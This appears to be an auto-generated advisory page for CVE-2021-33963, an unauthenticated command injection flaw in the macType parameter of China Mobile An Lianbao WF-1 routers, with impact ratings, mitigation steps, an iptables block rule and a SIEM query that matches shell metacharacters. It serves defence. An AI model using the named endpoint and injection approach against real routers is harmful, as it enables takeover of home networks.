CVE-2021-33963 – CVE-2021-33963 is a command injection vulnerabi... (How to Fix)

Q: What is the severity of CVE-2021-33963?

CVE-2021-33963 has a CVSS score of 9.8 (CRITICAL). CVE-2021-33963 is a command injection vulnerability in China Mobile An Lianbao WF-1 routers that allows remote attackers to execute arbitrary commands on affected devices. The vulnerability exists in the web interface's /api/ZRMacClone/mac_addr_clone endpoint where the macType parameter is not properly sanitized. This affects users of China Mobile An Lianbao WF-1 routers with vulnerable firmware.

📋 TL;DR

CVE-2021-33963 is a command injection vulnerability in China Mobile An Lianbao WF-1 routers that allows remote attackers to execute arbitrary commands on affected devices. The vulnerability exists in the web interface's /api/ZRMacClone/mac_addr_clone endpoint where the macType parameter is not properly sanitized. This affects users of China Mobile An Lianbao WF-1 routers with vulnerable firmware.

💻 Affected Systems

Products:

China Mobile An Lianbao WF-1 router

Versions: v1.0.1 and likely earlier versions

Operating Systems: Embedded Linux firmware

Default Config Vulnerable: ⚠️ Yes

Notes: Affects the web management interface which is typically enabled by default. The vulnerability is in the specific API endpoint handling MAC address cloning.

📦 What is this software?

An Lianbao Wf 1 Firmware by Chinamobile

View all CVEs affecting An Lianbao Wf 1 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the router allowing attacker to intercept all network traffic, install persistent backdoors, pivot to internal network devices, and potentially brick the device.

🟠

Likely Case

Attacker gains remote shell access to router, can modify DNS settings, intercept credentials, and use router as pivot point for further attacks.

🟢

If Mitigated

With proper network segmentation and firewall rules, impact limited to router compromise without lateral movement to other systems.

🌐 Internet-Facing: HIGH - Router web interface is typically internet-facing, allowing direct exploitation from anywhere.

🏢 Internal Only: MEDIUM - If web interface is only accessible internally, still vulnerable to insider threats or compromised internal systems.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires sending a crafted POST request to the vulnerable endpoint. No authentication is required, making this trivial to exploit.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: http://iot.10086.cn/?l=en-us

Restart Required: Yes

Instructions:

1. Check vendor website for firmware updates. 2. Download latest firmware. 3. Access router admin interface. 4. Navigate to firmware update section. 5. Upload and apply new firmware. 6. Reboot router.

🔧 Temporary Workarounds

Disable web management interface

linux

Disable the router's web management interface to prevent exploitation of the vulnerable endpoint.

Access router CLI via SSH/Telnet and disable web interface service

Block access to vulnerable endpoint

linux

Use router firewall rules to block access to /api/ZRMacClone/mac_addr_clone endpoint.

iptables -A INPUT -p tcp --dport 80 -m string --string "/api/ZRMacClone/mac_addr_clone" --algo bm -j DROP

🧯 If You Can't Patch

Segment router on isolated network VLAN to limit lateral movement
Implement strict firewall rules blocking all inbound access to router management interface

🔍 How to Verify

Check if Vulnerable:

Send POST request to http://[router-ip]/api/ZRMacClone/mac_addr_clone with macType parameter containing command injection payload and check for command execution.

Check Version:

Check router web interface admin page or use command: cat /etc/version on router CLI

Verify Fix Applied:

Attempt exploitation after applying firmware update or workarounds to confirm vulnerability is no longer exploitable.

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to /api/ZRMacClone/mac_addr_clone
Commands with shell metacharacters in macType parameter
Unexpected process execution from web server

Network Indicators:

POST requests to router IP on port 80/443 with command injection patterns in payload
Outbound connections from router to suspicious IPs

SIEM Query:

source="router_logs" AND uri_path="/api/ZRMacClone/mac_addr_clone" AND (request_body CONTAINS "|" OR request_body CONTAINS ";" OR request_body CONTAINS "`" OR request_body CONTAINS "$")

📊 Metadata

CVE ID: CVE-2021-33963

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-77

Published: January 15, 2022

Last Updated: November 21, 2024

🔗 References

http://iot.10086.cn/?l=en-us Product
https://github.com/pokerfacett/MY_CVE_CREDIT/blob/master/China%20Mobile%20An%20Lianbao%20WF-1%20router%20Command%20Injection9.md Broken Link,Third Party Advisory
https://www.cnvd.org.cn/flaw/show/CNVD-2021-03520 Third Party Advisory
https://www.ebuy7.com/item/china-mobile-wireless-router-qualcomm-qiki-wifi6-routing-mesh-network-home-5g-dual-frequency-double-gigabit-port-wall-wall-high-speed-%E2%80%8B%E2%80%8Bhigh-power-enhanced-dormitory-students-an-lianbao-wf-1-628692180620 Broken Link,Third Party Advisory
http://iot.10086.cn/?l=en-us Product
https://github.com/pokerfacett/MY_CVE_CREDIT/blob/master/China%20Mobile%20An%20Lianbao%20WF-1%20router%20Command%20Injection9.md Broken Link,Third Party Advisory
https://www.cnvd.org.cn/flaw/show/CNVD-2021-03520 Third Party Advisory
https://www.ebuy7.com/item/china-mobile-wireless-router-qualcomm-qiki-wifi6-routing-mesh-network-home-5g-dual-frequency-double-gigabit-port-wall-wall-high-speed-%E2%80%8B%E2%80%8Bhigh-power-enhanced-dormitory-students-an-lianbao-wf-1-628692180620 Broken Link,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-33963, you might also want to check these: